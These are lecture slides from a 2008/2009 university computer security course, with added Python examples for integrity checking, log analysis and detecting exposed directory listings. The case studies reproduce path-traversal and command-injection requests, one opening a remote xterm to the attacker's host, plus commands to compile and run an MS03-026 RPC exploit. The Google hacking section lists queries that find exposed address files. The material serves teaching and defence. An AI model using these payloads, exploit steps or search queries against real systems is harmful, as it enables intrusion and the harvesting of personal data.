KSK Class1 - Overview and Google Hacking
Keamanan Sistem Komputer (Computer Security)
RUDI LUMANTO
UNIVERSITAS BUDILUHUR
Even Semester 2008/2009
References and Contact Info
Matt Bishop, "Computer Security: Art and Science", Addison-Wesley, 2003, 1084 pages.
Deborah Russell and G.T. Gangemi Sr., "Computer Security Basics", O'Reilly & Associates.
John E. Canavan, "Fundamentals of Network Security", Artech House.
Internet sources.
Contact: RUDI, [email protected], 0815-1036-9754
RUDI LUMANTO UNIVERSITAS BUDILUHUR, Semester Genap 2008/2009
Universitas Budiluhur, Saturday 13:15-15:45
Grading Criteria
Assignments (2-4 reports): 10%
Mid-term exam: 40%
Attendance: 10%
Final exam: 40%
Syllabus
Overview / Introduction to computer security
Operating system / software security
Physical / hardware security
Network / Internet security
Software threats: viruses, worms, etc.
Internet threats: TCP attacks, DNS, DoS, etc.
Firewalls
Intrusion Detection Systems (IDS)
Introduction to cryptography
Cryptography applications
Kerberos scheme
VPN
Leak analysis
COMPUTER SECURITY: OVERVIEW
Course map:
Overview
Software security
Hardware security
Network security
Software threats: viruses, worms, etc.
Internet threats: TCP attacks, DoS, DNS, etc.
Firewall
Basic cryptography
Cryptography applications
Kerberos scheme
VPN
Leak analysis

COMPUTER SECURITY
1. OVERVIEW
Outline
Why computer security?
Computer security goals
Threats, vulnerabilities, attacks
Policy and measures
Simple cases and tools
Making a good security policy
Why Computer Security
To protect company/individual assets
– Hardware, software and INFORMATION (data, ability and reputation)
To gain a competitive advantage
– How many people would use a bank's internet banking system if they knew that the system had been hacked in the past?
To comply with regulatory requirements
To keep your job
Computer Security Goals
Confidentiality
Integrity
Availability
Confidentiality: prevention of unauthorized access to data, and of accidental data disclosures.
Integrity: prevention of improper modification of the data, whether intentional or accidental:
1) Modification of the data by unauthorized parties.
2) Operation on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption.
3) Any modification of append-only records that alters their evidential value.
Availability: measures taken to protect data should not make it cumbersome to access and modify the data in the ways in which it was intended.
Threats, Vulnerabilities and Attacks
THREATS
Anything that can disrupt the operation, functioning, integrity or availability of a computer system.
Stand-alone threats
– Threats that arise without any connection to another system. Ex: virus, password cracker
Connection threats
– Threats that arise because of a connection to another system
◆Threats arising from connection to other computers
Information leaks: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
Impersonation: an intruder fakes a membership site for the purchase of merchandise.
Attack platform: a corporate network administering a server that was used as a platform for attacking other sites was sued for compensation for the damage caused.
Vulnerabilities
Weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.
1. POOR DESIGN: hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.
2. POOR IMPLEMENTATION: systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not restrict access privileges on critical executable files.
3. POOR MANAGEMENT: inadequate procedures and insufficient checks and balances. Ex: no documentation and monitoring.
Critical Vulnerabilities and Vulnerability Scanning
Certain security vulnerabilities are declared critical when they are (or are about to be) actively exploited and represent a clear and present danger. Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.
◆Types of Vulnerability
OS/Program name | Cause | Influence
Index Server (Windows NT) / Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | Telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 - 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow in an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2.x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in the site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT) / IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is Unicode | Shell command executed with IUSR_Machinename permission by an outsider
ATTACKS
A specific technique used to exploit a vulnerability. Ex: a threat could be a denial of service, the vulnerability is in the design of the OS, and an attack could be a "ping of death".
Passive attacks
– Gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
Active attacks
– Overt actions on the computer system.
◆Denial of Service (diagram)
Attack platform -> "Start attack!!" -> target host
• Large volume of data
• Packets causing a system down
Target host: service downed due to overload
Policy and Measure
Security Trinity: the foundation for all security policies and measures that an organization develops and deploys.
What is security? Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety
- Measures adopted .... to prevent a crime.
Security = Prevention
Computer security measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.
Key point
Computer security is not only a technical problem, it is a business and people problem.
The technology is the easy part; the difficult part is developing a security policy/plan that fits the organization's business operation and getting people to comply with the plan.
Social engineering: the non-technical methods hackers employ to gain access to a system; refers to the process of convincing a person to reveal information.
Security operations
- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access, restoring data values, system integrity, etc.
Policies and Procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incidents
- User role, etc.
◆Types of Users
Hacker: a user who tries to obtain access using advanced knowledge and techniques.
Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.
(Diagram: intrusion, subversion and sabotage against a corporate network through its vulnerabilities.)
◆Integrity Check Tool
/etc/passwd file
Hash value (MD5): dc577ef5f97b671781c04425737bc4df
File editing/falsification -> new hash value b0ed782bbd4c8445f07538a3ede788eb
Mismatch ... Altered!!
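The integrity check the slide draws (hash a file, store the digest, re-hash later and compare) as an added example; this is not a tool from the slides. It uses MD5 to match the slide, but the `algorithm` parameter lets a modern baseline use SHA-256, since MD5 is no longer collision-resistant. The passwd content and the appended account are constructed sample data.

```python
import hashlib
import os
import tempfile

# Sample passwd content, constructed for this example (not a real file).
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\nlion:x:500:500::/home/lion:/bin/bash\n"


def file_digest(path, algorithm="md5"):
    """Hash a file in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths, algorithm="md5"):
    """Record the known-good digest of every monitored file."""
    return {p: file_digest(p, algorithm) for p in paths}


def verify_baseline(baseline, algorithm="md5"):
    """Re-hash every file and classify it as ok, altered or missing."""
    report = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            report[path] = "missing"
        elif file_digest(path, algorithm) != expected:
            report[path] = "altered"
        else:
            report[path] = "ok"
    return report


def demo(algorithm="md5"):
    """Replay the slide: baseline a passwd file, falsify it, detect the mismatch."""
    with tempfile.TemporaryDirectory() as tmp:
        passwd = os.path.join(tmp, "passwd")
        with open(passwd, "wb") as fh:
            fh.write(SAMPLE_PASSWD)
        baseline = build_baseline([passwd], algorithm)
        before = verify_baseline(baseline, algorithm)[passwd]
        # Falsification: an extra uid-0 account is appended to the file.
        with open(passwd, "ab") as fh:
            fh.write(b"evil:x:0:0::/:/bin/bash\n")
        after = verify_baseline(baseline, algorithm)[passwd]
        return before, after


if __name__ == "__main__":
    print(demo())  # ('ok', 'altered')
```

The baseline must itself be kept where an intruder who gains root cannot rewrite it (read-only media or a separate host), otherwise the attacker simply re-baselines the altered file.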
◆Security Tools and Security Products
Countermeasures against hacking, placed between the malicious user on the Internet and the server/client on the corporate network:
Network security
• Router (filtering)
• Firewall (VPN)
• N-IDS
• Vulnerability audit
Server security
• H-IDS
• Log monitoring
• Falsification prevention
• Vulnerability audit
Miscellaneous
• Virus scan
• Encryption (SSH)
◆Firewall?
Diagram: Internet | firewall | Intranet, with a public WWW server and a public FTP server on the Internet side and clients/servers with authentication on the Intranet side. Numbered flows: ① HTTP, ② HTTP, ③ FTP, ④ HTTP, ⑤ unspecified application.
Gateway-type firewall
• Packet filtering
• Application gateway
• Stateful inspection
◆Encryption: VPN (Virtual Private Network) = a leased line over the Internet, e.g. IPsec, IPv6
Diagram: FW/VPN routers at each site and remote access users connect through providers A, B, C and D and the Internet IX; the communication between the FW/VPN endpoints is encrypted.
Response to Computer Security Incidents
Mandatory incident reporting:
– Report all suspicious activity, ex:
• If urgent, to the Computer Helpdesk
• Or to the system manager (if immediately available)
• Non-urgent to [email protected]
– Incidents investigated by the Computer Incident Response Team (CIRT)
– Not to be discussed!
CIRT (Computer Security Incident Response Team)
Security experts drawn from throughout the lab
Investigate ("triage") initial reports
Coordinate the investigation overall
Work with local system managers
Call in technical experts
May take control of affected systems
Maintain confidentiality
Other Rules for General Systems
Warning system
– First time warning, repeat offense disciplinary action
Unauthorized or malicious actions
– Damage of data, unauthorized use of accounts, denial of service, etc., are forbidden
Ethical behavior
– Same standards as for non-computer activities
Restricted central services
– May only be provided by the Computing Division
Security & cracker tools
– Possession (& use) must be authorized
User role
Guard against malicious code in email
– Don't open attachments unless you are sure they are safe
– Don't trust who the email is from
– Keep virus signatures updated and enabled
Guard against malicious code from web browsing
User role - 2
Obey the Strong Authentication Policy (Kerberos)
– Don't run network services (login or read/write ftp) unless they demand Kerberos authentication
– Treat your Kerberos password as a sacred object (never expose it over the network)
Promptly report potential computer security incidents
– Ex: call by telephone or email to [email protected] (if in US)
– Follow CIRT instructions during incidents (especially about keeping infected machines off the network and preserving the status of an infected machine for expert investigation)
Example of Policy Issues
Data backup
Incidental use
Privacy
Offensive material
Licensing
Data Backup Policy - Users
– Users (data owners) are responsible for determining:
• What data requires protection
• How destroyed data would be recovered, if needed
• Coordinating the backup plan with sysadmins
– or doing their own backups
• If the backup is done for you it might be worth occasionally checking that you can really retrieve the data
Privacy of Email and Files
May not use information in another person's files seen incidental to any activity (legitimate or not) for any purpose without either explicit permission of the owner or a "reasonable belief the file was meant to be accessed by others."
– Whether or not group/world accessible
– "Group" files implicitly may be used by the group for the mission of the group
A simple case and tool (seeing the technique/information behind a case)
A Security Case
A company called "Acme-art Inc." does online business on the internet. They have a database that records all customer information, including credit card information, and it is connected to their site www.acme-art.com, which is protected by a firewall. On 31 October 2001 a hacker intruded into their system and stole all the credit card information, then posted it to a Usenet newsgroup. A few hours later the company had lost millions of dollars and its reputation, and had to invest much more money to keep the business alive.
What happened? How could it happen?
Fact: the firewall is installed, and internet access can only be done through HTTP port 80.
Security team investigation: Sample case 1
Looking for clues in the log file...
A:
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
B:
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
C:
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
D:
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
E:
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
F:
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Security team investigation: Sample case 1
Part A in the log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsing ...
Part B in the log file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
Browsing ...
Part C in the log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
Trying direct access ... error response
Part D in the log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking ... Security hole 1
Perl script (index.cgi)
Security hole 1: the value of the page parameter passed to the index.cgi script is not validated
Part E in the log file
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
Attacking ... Security hole 1
Retrieving the passwd file
Passwd file
root:x:0:0:root:/root:/bin/bash
.........
Lion:x:500:500::/home/lion:/bin/bash
Security hole 1 effect: retrieving the important "passwd" file
Part F in the log file
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Attacking ... Security hole 2
Direct execution of server commands
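The investigation above reads the log by eye; as an added example (not a tool from the slides or from the company in the case), here is the same analysis as detection logic: parse Apache common log format, URL-decode each request and flag the traits that distinguish parts C to F from the benign browsing in parts A and B (a 403 probe, `../` traversal, a read of /etc/passwd, and shell metacharacters in the page parameter). `SAMPLE_LOG` is a subset of the log lines from the slides.

```python
import re
from urllib.parse import unquote_plus

# Log lines from the Acme-art case on the slides (Apache common log format).
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Shell metacharacters that never belong in a page name once the request is
# URL-decoded: pipe, semicolon, backtick, ampersand, newline and $( .
SHELL_META_RE = re.compile(r'[|;`&\n]|\$\(')
SENSITIVE_RE = re.compile(r'/etc/(passwd|shadow)\b')


def parse_line(line):
    """Split one common-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the suspicious traits of one request (empty list if benign)."""
    labels = []
    decoded = unquote_plus(entry["target"])  # %0a -> newline, + -> space, %26 -> &
    if "../" in decoded:
        labels.append("traversal")
    if SENSITIVE_RE.search(decoded):
        labels.append("sensitive-file")
    if "?" in decoded and SHELL_META_RE.search(decoded.split("?", 1)[1]):
        labels.append("command-injection")
    if entry["status"] == "403":
        labels.append("forbidden")
    return labels


def analyze(log_text):
    """Parse every line and keep those carrying at least one suspicious trait."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        labels = classify(entry)
        if labels:
            findings.append((entry["ip"], entry["time"], entry["target"], labels))
    return findings


def summarize(findings):
    """Count how often each trait occurs across the flagged requests."""
    counts = {}
    for _ip, _time, _target, labels in findings:
        for label in labels:
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, when, target, labels in analyze(SAMPLE_LOG):
        print(f"{when} {ip} {', '.join(labels):<32} {target}")
```

Note that every flagged request returned status 200, so status codes alone would not have caught the intrusion; decoding the query string is what exposes it.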
Information/technique behind the case
Information about the target: HTTP structure, CGI/Perl, the Linux system and its commands
Httpd file default structure: what is the web site structure? (tree reconstructed from the slide diagram, host Lisv01)
/ (root)
  home: u01, u02, u03, ... each with public_html (default user's directory)
  var: www/html (default document root), log/httpd
  sbin, bin, dev
  etc: httpd/conf/httpd.conf, init.d/httpd
  usr ...
*Document root: the directory that holds HTML documents.
Behind the Web
Client-side application: the WWW browser downloads HTML and script from the WWW server software over the Internet/Intranet and executes the application inside the browser (JavaScript).
Network-loading application: the browser downloads an application from the WWW server and executes it locally (Java applet, ActiveX).
Server-side application: the browser sends a request over the Internet/Intranet and the WWW server software executes the application on the server (CGI, Active Server Pages).
Sample case 2
After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, and it led to a large loss in production.
What happened? How could it happen?
No log file indication!!!
Security team investigation: looking for clues by social engineering
Sample case 2
One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address.
Other clues: 1. Nessus report on vulnerabilities in Windows 2000; 2. exploit program available
Analysis of Host: Nessus report on a Windows 2000 server after IIS installation
Address of Host | Port/Service | Issue regarding port
192.168.27.31 | ftp (21/tcp) | Security hole found
192.168.27.31 | smtp (25/tcp) | Security hole found
192.168.27.31 | http (21/tcp) | Security hole found
192.168.27.31 | nntp (119/tcp) | Security hole found
192.168.27.31 | msrpc (135/tcp) | Security hole found
192.168.27.31 | netbios-ssn (139/tcp) | No security hole found
192.168.27.31 | https (443/tcp) | No security hole found
192.168.27.31 | microsoft-ds (445/tcp) | Security hole found
... | ... | ...
NESSUS report in detail
Sample case 2
(end of the preceding finding) Other references: IAVA:2003-A-0012; NESSUS ID: 11835
Vulnerability msrpc (135/tcp): The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability, namely the MsBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806
Warning msrpc (135/tcp): Distributed Computing Environment (DCE) services running on the remote host
NESSUS ID: identity number of the vulnerability check by NESSUS
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site
Simulation
1. Downloading the exploit code source file (from the SecurityFocus site or the Whoppix CD)
$ cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file
$ gcc oc192-dom.c
3. Executing the exploit against the target machine's IP
$ a.out -d 192.168.94.204
Get the system access
C:\WINNT\SYSTEM32>
Information/technique behind the case
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the internet
- Lack of information about updates
Sample case 3
What kind of security techniques are behind it?
The Warriors of the Net
Making a good security policy
Penetration Test / Ethical Hacking
– Understanding what is inside the hacker's mind
Security Trinity
Security Goals
Definition of "Ethical Hacking"
Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. An individual involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.
One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the Hacker's Mind
- Focus on the target: successfully attack and stay safe
- Never use your own information
- Never leave your footsteps
- Can always come back again
HACKERS' PROCEDURE
Hackers' procedure/steps (from the slide diagram):
1. Information gathering: targeting, scanning
2. Attack, intrusion: remote attack, local attack
3. Unauthorized act: space using
4. Actions taken after the unauthorized act: log removing/deception, time stamp, back door
Example of Targeting
All information about the target
Technique name: web browser targeting
Goals: personal information about the target
Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)
Location, related company/organization, news, telephone number, contact (mail address), web author ideas/thoughts/behaviour, site software
Targeting with Google
By using basic search techniques combined with Google's advanced operators, anyone can perform information gathering and vulnerability searching using Google. This technique is commonly referred to as Google hacking.
Google hacking
Mastering Google using its standard options
– Double quotation .... a keyword is recognized as a phrase
– Hyphen (-) .... if you want to exclude words containing the keyword
– site: .... search only inside the site
– * .... wildcard; use with double quotation to find any word in the indicated position
– intitle: .... search limited to the web page title
– inurl: .... search limited to the web page URL
– intext: .... search limited to the main text of the page
– filetype: .... search focusing on the file extension type
– phonebook: .... search for telephone numbers
Google hacking: mastering Google using its options
– site: .... search only inside the site
"hacker" site:www.cnn.com or site:www.cnn.com hacker
This query searches for the word hacker, restricting the search to the http://www.cnn.com web site. How many pages on the CNN web server contain the word hacker?
– * .... wildcard; use with double quotation to find any word in the indicated position
"He is a * Hacker"
– intitle: .... search limited to the web page title
intitle:"Hacker"
– inurl: .... search limited to the web page URL
inurl:www.securityfocus.com
– intext: .... search limited to the main text of the page
intext:"earthquake"
– filetype: .... search focusing on the file extension type
"hacking" filetype:ppt
"whoppix" filetype:iso
– phonebook: .... search for telephone numbers
phonebook:John Doe CA
More on Google hacking
Searching inside a site for what is (actually) not meant to be exposed to the public
Finding directory listings on a server
Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.
Most directory listings begin with the phrase "Index of", which also shows in the title. An obvious query to find this type of page might be
intitle:index.of
which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
More on Google hacking
Combining Google options in queries
Several alternate queries provide more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on index.of in the title, but also on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.
Example: Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
Example: Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
Example: bbs.dat inurl:"Index of" intitle:"Index of"
Example: searching for a database of people's addresses written in CSV, focusing on Japanese sites: filetype:csv address site:jp
Example: searching for a database of people's addresses written in Excel, focusing on UK sites: filetype:xls address site:uk
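The slides explain why intitle:index.of alone gives false positives and why adding "parent directory", "name" and "size" fixes that. As an added example (not from the slides), the same heuristic turned around for a site owner: run over pages crawled from your own server, it flags exposed directory listings before a search engine indexes them, and it rejects the "Index of Native American Resources" style of false positive. The two HTML pages and the example.test URLs are constructed.

```python
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect the <title> text and the visible body text of an HTML page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.body_words = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        self._in_title = tag == "title"

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        else:
            self.body_words.append(data)


# The keywords the slides use to narrow an intitle:index.of query.
LISTING_KEYWORDS = ("parent directory", "name", "last modified", "size", "description")


def is_directory_listing(html, min_keywords=3):
    """Slide heuristic: title starts with 'Index of' AND listing keywords appear in the body."""
    p = _TextExtractor()
    p.feed(html)
    title = p.title.strip().lower()
    body = " ".join(p.body_words).lower()
    if not title.startswith("index of"):
        return False
    hits = sum(1 for kw in LISTING_KEYWORDS if kw in body)
    return hits >= min_keywords


def audit_pages(pages):
    """Return the URLs (dict keys) whose HTML looks like an exposed directory listing."""
    return [url for url, html in pages.items() if is_directory_listing(html)]


# Constructed pages: an Apache-style listing and one of the false positives
# named on the slides.
APACHE_LISTING = """<html><head><title>Index of /data</title></head><body>
<h1>Index of /data</h1><pre>Name Last modified Size Description
<a href="/">Parent Directory</a> -
<a href="bbs.dat">bbs.dat</a> 2001-10-31 03:05 12K
</pre></body></html>"""

FALSE_POSITIVE = """<html><head><title>Index of Native American Resources on the Internet</title>
</head><body><p>A curated index of links. Name your favourite.</p></body></html>"""


if __name__ == "__main__":
    print(audit_pages({"http://example.test/data/": APACHE_LISTING,
                       "http://example.test/links": FALSE_POSITIVE}))
```

On Apache the fix for a flagged page is to remove `Indexes` from that directory's `Options` (or place an index file there), after which the listing disappears.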